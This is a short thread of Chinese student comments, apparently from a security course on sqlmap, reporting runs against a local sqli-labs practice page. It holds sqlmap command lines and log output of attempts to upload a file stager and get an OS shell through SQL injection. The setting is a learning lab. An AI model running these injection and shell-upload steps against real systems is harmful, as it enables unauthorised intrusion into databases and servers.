• 开心哥
    2020-08-20
    file-read, file-write 都可以 os-shell 没有权限,进容器改了一个目录权限才成功看到shell。 [15:25:42] [WARNING] unable to automatically parse any web server path [15:25:42] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [15:25:43] [WARNING] reflective value(s) found and filtering out [15:25:43] [WARNING] unable to upload the file stager on '/var/www/' [15:25:43] [INFO] trying to upload the file stager on '/var/www/' via UNION method [15:25:43] [WARNING] expect junk characters inside the file as a leftover from UNION query [15:25:43] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
    展开
    
    3
  • 董昊
    2021-03-07
    老师,我运行的结果是: 失败:sqlmap -u "http://127.0.0.1/Less-31/" 成功:sqlmap -u "http://127.0.0.1/Less-31/?id=1" 失败:sqlmap -u "http://127.0.0.1/Less-31/" --risk 3 --level 5 成功:sqlmap -u "http://127.0.0.1/Less-31/?id=1" --risk 3 --level 5 在指定了level和risk后,如果不加参数情况下,虽说会增加大量payload,但也并没有成功。 是不是说实际测试的时候还是要根据具体情况动态调整url才行,不能直接把URL直接丢给sqlmap来跑?
    
    